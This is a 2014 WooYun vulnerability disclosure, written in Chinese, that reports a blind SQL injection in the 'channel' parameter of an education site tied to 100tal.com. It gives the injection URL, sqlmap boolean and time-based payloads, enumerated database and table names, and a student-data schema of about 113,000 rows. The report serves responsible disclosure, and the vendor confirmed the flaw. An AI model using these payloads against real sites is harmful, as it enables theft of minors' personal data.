漏洞概要 关注数(3) 关注此漏洞
缺陷编号: WooYun-2014-72424
漏洞标题: 学而思旗下某分站SQL注入漏洞泄漏大量用户信息
相关厂商: 100tal.com
漏洞作者: Coffee
提交时间: 2014-08-15 09:10
公开时间: 2014-09-29 19:08
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 15
漏洞状态: 厂商已经确认
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: php+数字类型注射 Mysql
漏洞详情
披露状态:
2014-08-15: 细节已通知厂商并且等待厂商处理中
2014-08-15: 厂商已经确认,细节仅向厂商公开
2014-08-25: 细节向核心白帽子及相关领域专家公开
2014-09-04: 细节向普通白帽子公开
2014-09-14: 细节向实习白帽子公开
2014-09-29: 细节向公众公开
简要描述:
学而思旗下某分站SQL注入漏洞泄漏大量用户信息
(最近都找学而思的了……有点丧病,估计这是最后一个了)
详细说明:
注入点:http://vip.eduu.com/event?channel=5
参数channel未过滤
sqlmap跑起来:
Place: GET
Parameter: channel
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channel=5) AND 9372=9372 AND (5377=5377
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: channel=5) AND SLEEP(5) AND (5061=5061
---
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] eduu_vip
[*] eduu_zuowen
[*] information_schema
[*] test
---
back-end DBMS: MySQL 5.0.11
Database: eduu_vip
[28 tables]
+------------------------+
| edu_adimg |
| edu_baoming_misc |
| edu_doc |
| edu_doc_buylog |
| edu_doc_down |
| edu_edm_category |
| edu_edm_send_log |
| edu_edm_subscribe |
| edu_edm_subscribe_out |
| edu_edm_task |
| edu_event |
| edu_event_category |
| edu_event_ext |
| edu_event_user |
| edu_gift |
| edu_gift_decode |
| edu_gift_log |
| edu_notice |
| edu_set |
| edu_trends |
| edu_vip |
| edu_vip2 |
| edu_vip_credit_log |
| edu_vip_credit_loglist |
| edu_vip_credit_rule |
| edu_vip_dcode |
| edu_vip_exper_loglist |
| edu_vip_sms |
+------------------------+
back-end DBMS: MySQL 5.0.11
Database: eduu_zuowen
[6 tables]
+-------------+
| zw_artinfo |
| zw_column |
| zw_comment |
| zw_feedback |
| zw_teacher |
| zw_topic |
+-------------+
盲注跑得慢,随便找一张表看下数据量吧……
back-end DBMS: MySQL 5.0.11
Database: eduu_vip
Table: edu_vip
[26 columns]
+-----------------------+-------------------------------------------------------------------------------------------------+
| Column | Type |
+-----------------------+-------------------------------------------------------------------------------------------------+
| course | set('语文','数学','英语','物理','化学','生物','地理','政治','历史','体育','音乐','美术','其他') |
| ctime | int(10) unsigned |
| downtimes | tinyint(3) unsigned |
| edctime | int(10) unsigned |
| email | varchar(100) |
| expertime | int(10) unsigned |
| grade | set('未上学','幼儿园择园','幼儿园','一年级','二年级','三年级','四年级','五年级','六年级','初一','初二','初三','高一','高二','高三','其他') |
| id | mediumint(8) unsigned |
| iden | tinyint(1) unsigned |
| ltime | int(10) unsigned |
| mbind | tinyint(3) unsigned |
| mobile | varchar(15) |
| peiyou_register_ctime | int(11) |
| peiyou_student_name | varchar(50) |
| peiyou_student_no | varchar(30) |
| qq | varchar(15) |
| residecity | varchar(50) |
| school | varchar(50) |
| state | tinyint(1) unsigned |
| tcity | tinyint(3) unsigned |
| type | tinyint(1) unsigned |
| uid | int(10) unsigned |
| uname | varchar(30) |
| uvip | tinyint(4) |
| vipexper | mediumint(8) unsigned |
| vipscore | mediumint(8) unsigned |
+-----------------------+-------------------------------------------------------------------------------------------------+
back-end DBMS: MySQL 5.0.11
Database: eduu_vip
+---------+---------+
| Table | Entries |
+---------+---------+
| edu_vip | 113379 |
+---------+---------+
11万,也不少了。而且看列名资料相当详细。姓名、学校、年级、年级、科目、手机号、QQ……一大堆。
漏洞证明:
back-end DBMS: MySQL 5.0.11
Database: eduu_vip
+---------+---------+
| Table | Entries |
+---------+---------+
| edu_vip | 113379 |
+---------+---------+
修复方案:
#1、过滤参数(如果程序员大哥不清楚SQL注入的话简单科普:http://www.cn-sec.com/drops//papers/59)
#2、学而思网站安全做的还不错啊,找个洞也没有想象中容易~
#3、估计是最后一个了,祝学而思越办越好(好俗的话……)
版权声明:转载请注明来源 Coffee@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-08-15 10:13
厂商回复:
洞主小朋友威武,程序兄弟正哭着修复,谢谢支持!
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
评论